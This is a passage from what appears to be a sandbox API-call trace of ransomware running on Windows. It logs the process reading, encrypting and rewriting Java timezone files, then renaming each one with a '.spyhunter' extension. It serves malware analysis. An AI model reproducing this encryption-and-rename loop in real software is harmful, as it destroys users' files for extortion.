lpNewFilePointer=0xffffffff) returned 1 [0168.370] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x74c, lpNumberOfBytesWritten=0x57e664, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e664*=0x74c, lpOverlapped=0x0) returned 1 [0168.370] GetProcessHeap () returned 0x2c0000 [0168.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.370] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.370] WriteFile (in: hFile=0xb0, lpBuffer=0x57e6a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e664, lpOverlapped=0x0 | out: lpBuffer=0x57e6a4*, lpNumberOfBytesWritten=0x57e664*=0x4, lpOverlapped=0x0) returned 1 [0168.370] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e664, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e664*=0x30, lpOverlapped=0x0) returned 1 [0168.370] CloseHandle (hObject=0xb0) returned 1 [0168.371] GetProcessHeap () returned 0x2c0000 [0168.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.371] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Lisbon.spyhunter") returned 67 [0168.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Lisbon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\lisbon"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Lisbon.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\lisbon.spyhunter")) returned 1 [0168.371] GetProcessHeap () returned 0x2c0000 [0168.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.372] GetProcessHeap () returned 0x2c0000 [0168.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.372] GetProcessHeap () returned 0x2c0000 [0168.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe300 | out: hHeap=0x2c0000) returned 1 [0168.372] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6a0 | out: pbBuffer=0x57e6a0) returned 1 [0168.372] GetProcessHeap () returned 0x2c0000 [0168.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.372] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e698*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e698*=0x30) returned 1 [0168.372] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Helsinki" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\helsinki"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.373] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Helsinki") returned 59 [0168.373] StrStrW (lpFirst="Helsinki", lpSrch=".txt") returned 0x0 [0168.373] GetProcessHeap () returned 0x2c0000 [0168.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.373] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e65c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e65c*=0x40c, lpOverlapped=0x0) returned 1 [0168.422] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffbf4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.422] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x40c, lpNumberOfBytesWritten=0x57e65c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e65c*=0x40c, lpOverlapped=0x0) returned 1 [0168.422] GetProcessHeap () returned 0x2c0000 [0168.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.422] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.422] WriteFile (in: hFile=0xb0, lpBuffer=0x57e69c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e65c, lpOverlapped=0x0 | out: lpBuffer=0x57e69c*, lpNumberOfBytesWritten=0x57e65c*=0x4, lpOverlapped=0x0) returned 1 [0168.422] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e65c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e65c*=0x30, lpOverlapped=0x0) returned 1 [0168.422] CloseHandle (hObject=0xb0) returned 1 [0168.422] GetProcessHeap () returned 0x2c0000 [0168.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.423] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Helsinki.spyhunter") returned 69 [0168.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Helsinki" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\helsinki"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Helsinki.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\helsinki.spyhunter")) returned 1 [0168.423] GetProcessHeap () returned 0x2c0000 [0168.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.424] GetProcessHeap () returned 0x2c0000 [0168.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.424] GetProcessHeap () returned 0x2c0000 [0168.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe180 | out: hHeap=0x2c0000) returned 1 [0168.424] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e6a0 | out: pbBuffer=0x57e6a0) returned 1 [0168.424] GetProcessHeap () returned 0x2c0000 [0168.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.424] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e698*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e698*=0x30) returned 1 [0168.424] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Gibraltar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\gibraltar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.425] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Gibraltar") returned 60 [0168.425] StrStrW (lpFirst="Gibraltar", lpSrch=".txt") returned 0x0 [0168.425] GetProcessHeap () returned 0x2c0000 [0168.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.425] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e65c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e65c*=0x68c, lpOverlapped=0x0) returned 1 [0168.494] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff974, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.494] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x68c, lpNumberOfBytesWritten=0x57e65c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e65c*=0x68c, lpOverlapped=0x0) returned 1 [0168.494] GetProcessHeap () returned 0x2c0000 [0168.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.494] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.494] WriteFile (in: hFile=0xb0, lpBuffer=0x57e69c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e65c, lpOverlapped=0x0 | out: lpBuffer=0x57e69c*, lpNumberOfBytesWritten=0x57e65c*=0x4, lpOverlapped=0x0) returned 1 [0168.494] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e65c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e65c*=0x30, lpOverlapped=0x0) returned 1 [0168.494] CloseHandle (hObject=0xb0) returned 1 [0168.494] GetProcessHeap () returned 0x2c0000 [0168.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0168.494] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Gibraltar.spyhunter") returned 70 [0168.494] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Gibraltar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\gibraltar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Gibraltar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\gibraltar.spyhunter")) returned 1 [0168.495] GetProcessHeap () returned 0x2c0000 [0168.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0168.495] GetProcessHeap () returned 0x2c0000 [0168.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.495] GetProcessHeap () returned 0x2c0000 [0168.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebbf88 | out: hHeap=0x2c0000) returned 1 [0168.496] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e698 | out: pbBuffer=0x57e698) returned 1 [0168.496] GetProcessHeap () returned 0x2c0000 [0168.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.496] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e690*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e690*=0x30) returned 1 [0168.496] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Copenhagen" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\copenhagen"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.497] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Copenhagen") returned 61 [0168.497] StrStrW (lpFirst="Copenhagen", lpSrch=".txt") returned 0x0 [0168.497] GetProcessHeap () returned 0x2c0000 [0168.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.497] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e654, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e654*=0x480, lpOverlapped=0x0) returned 1 [0168.714] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.714] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x57e654, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e654*=0x480, lpOverlapped=0x0) returned 1 [0168.715] GetProcessHeap () returned 0x2c0000 [0168.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.715] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.715] WriteFile (in: hFile=0xb0, lpBuffer=0x57e694*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e654, lpOverlapped=0x0 | out: lpBuffer=0x57e694*, lpNumberOfBytesWritten=0x57e654*=0x4, lpOverlapped=0x0) returned 1 [0168.715] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e654, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e654*=0x30, lpOverlapped=0x0) returned 1 [0168.715] CloseHandle (hObject=0xb0) returned 1 [0168.715] GetProcessHeap () returned 0x2c0000 [0168.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.715] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Copenhagen.spyhunter") returned 71 [0168.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Copenhagen" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\copenhagen"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Copenhagen.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\copenhagen.spyhunter")) returned 1 [0168.716] GetProcessHeap () returned 0x2c0000 [0168.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.716] GetProcessHeap () returned 0x2c0000 [0168.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.716] GetProcessHeap () returned 0x2c0000 [0168.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebbec0 | out: hHeap=0x2c0000) returned 1 [0168.716] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e698 | out: pbBuffer=0x57e698) returned 1 [0168.716] GetProcessHeap () returned 0x2c0000 [0168.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.716] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e690*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e690*=0x30) returned 1 [0168.716] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Belgrade" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\belgrade"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.717] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Belgrade") returned 59 [0168.717] StrStrW (lpFirst="Belgrade", lpSrch=".txt") returned 0x0 [0168.717] GetProcessHeap () returned 0x2c0000 [0168.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.717] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e654, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e654*=0x410, lpOverlapped=0x0) returned 1 [0168.719] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.719] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x57e654, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e654*=0x410, lpOverlapped=0x0) returned 1 [0168.719] GetProcessHeap () returned 0x2c0000 [0168.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.719] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.719] WriteFile (in: hFile=0xb0, lpBuffer=0x57e694*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e654, lpOverlapped=0x0 | out: lpBuffer=0x57e694*, lpNumberOfBytesWritten=0x57e654*=0x4, lpOverlapped=0x0) returned 1 [0168.719] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e654, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e654*=0x30, lpOverlapped=0x0) returned 1 [0168.719] CloseHandle (hObject=0xb0) returned 1 [0168.719] GetProcessHeap () returned 0x2c0000 [0168.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.719] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Belgrade.spyhunter") returned 69 [0168.719] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Belgrade" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\belgrade"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Belgrade.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\belgrade.spyhunter")) returned 1 [0168.720] GetProcessHeap () returned 0x2c0000 [0168.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.720] GetProcessHeap () returned 0x2c0000 [0168.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.720] GetProcessHeap () returned 0x2c0000 [0168.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebdd00 | out: hHeap=0x2c0000) returned 1 [0168.720] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e690 | out: pbBuffer=0x57e690) returned 1 [0168.720] GetProcessHeap () returned 0x2c0000 [0168.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.721] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e688*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e688*=0x30) returned 1 [0168.721] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Athens" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\athens"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.721] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Athens") returned 57 [0168.721] StrStrW (lpFirst="Athens", lpSrch=".txt") returned 0x0 [0168.721] GetProcessHeap () returned 0x2c0000 [0168.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.721] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e64c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e64c*=0x4ac, lpOverlapped=0x0) returned 1 [0168.722] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.722] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4ac, lpNumberOfBytesWritten=0x57e64c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e64c*=0x4ac, lpOverlapped=0x0) returned 1 [0168.723] GetProcessHeap () returned 0x2c0000 [0168.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.723] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.723] WriteFile (in: hFile=0xb0, lpBuffer=0x57e68c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e64c, lpOverlapped=0x0 | out: lpBuffer=0x57e68c*, lpNumberOfBytesWritten=0x57e64c*=0x4, lpOverlapped=0x0) returned 1 [0168.723] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e64c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e64c*=0x30, lpOverlapped=0x0) returned 1 [0168.723] CloseHandle (hObject=0xb0) returned 1 [0168.723] GetProcessHeap () returned 0x2c0000 [0168.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.723] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Athens.spyhunter") returned 67 [0168.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Athens" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\athens"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Athens.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\athens.spyhunter")) returned 1 [0168.724] GetProcessHeap () returned 0x2c0000 [0168.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.724] GetProcessHeap () returned 0x2c0000 [0168.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.724] GetProcessHeap () returned 0x2c0000 [0168.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd700 | out: hHeap=0x2c0000) returned 1 [0168.724] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e690 | out: pbBuffer=0x57e690) returned 1 [0168.724] GetProcessHeap () returned 0x2c0000 [0168.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.724] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e688*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e688*=0x30) returned 1 [0168.724] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Andorra" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\andorra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.725] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Andorra") returned 58 [0168.725] StrStrW (lpFirst="Andorra", lpSrch=".txt") returned 0x0 [0168.725] GetProcessHeap () returned 0x2c0000 [0168.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.725] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e64c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e64c*=0x3c8, lpOverlapped=0x0) returned 1 [0168.790] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffc38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.790] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3c8, lpNumberOfBytesWritten=0x57e64c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e64c*=0x3c8, lpOverlapped=0x0) returned 1 [0168.790] GetProcessHeap () returned 0x2c0000 [0168.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.790] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.791] WriteFile (in: hFile=0xb0, lpBuffer=0x57e68c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e64c, lpOverlapped=0x0 | out: lpBuffer=0x57e68c*, lpNumberOfBytesWritten=0x57e64c*=0x4, lpOverlapped=0x0) returned 1 [0168.791] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e64c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e64c*=0x30, lpOverlapped=0x0) returned 1 [0168.791] CloseHandle (hObject=0xb0) returned 1 [0168.791] GetProcessHeap () returned 0x2c0000 [0168.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.791] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Andorra.spyhunter") returned 68 [0168.791] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Andorra" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\andorra"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Andorra.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\andorra.spyhunter")) returned 1 [0168.791] GetProcessHeap () returned 0x2c0000 